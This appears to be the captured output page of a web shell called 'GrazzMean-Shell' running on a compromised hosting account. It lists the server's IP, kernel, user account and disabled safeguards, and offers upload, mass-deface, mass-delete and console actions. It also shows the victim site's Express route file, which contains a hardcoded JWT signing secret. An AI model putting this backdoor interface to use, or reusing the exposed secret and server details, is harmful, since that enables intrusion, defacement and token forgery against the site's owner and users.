shell bypass 403

GrazzMean-Shell Shell

: /home/allssztx/needapair.com/routes/ [ drwxr-xr-x ]
Uname: Linux business55.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
Software: LiteSpeed
PHP version: 8.1.31 [ PHP INFO ] PHP os: Linux
Server Ip: 162.213.251.212
Your Ip: 18.217.47.171
User: allssztx (535) | Group: allssztx (533)
Safe Mode: OFF
Disable Function:
NONE
upload mass deface mass delete console

name : dashboard.js 
const express = require('express');
const router = express.Router();
const User = require('../schema/User')
const Sale = require('../schema/Sale')
const session = require
const bcrypt = require('bcryptjs');
const jwt = require('jsonwebtoken');
const JWT_SECRET = 'B!llHe$$';
const sendMail = require('./email/sendMail')
const validateResetToken = require('../middleware/validateResetToken');
const mongoose  = require('mongoose');




router.get('/', async (req, res) => {
    try {
        const url = '/api/dashboard'
        var baseUrl = req.baseUrl
        console.log("baseUrl",baseUrl)
        var error = req.query.error;
        var message = req.query.message;
        var user = req.user;
        var sales = await Sale.find()
        const customers = await User.find()

        if (user) {

            console.log("customers",customers);
            if (user.role == 'admin') {
                
                return res.render('dashboard', { error, baseUrl, message, sales, customers});
            }
        }
        
        res.redirect(`/login?error=Login with Admin Credentials to see admin Dashboard...&url=${url}`);


    }
    catch (error) {
        console.log(error)
    }

})

module.exports = router
© 2025 GrazzMean-Shell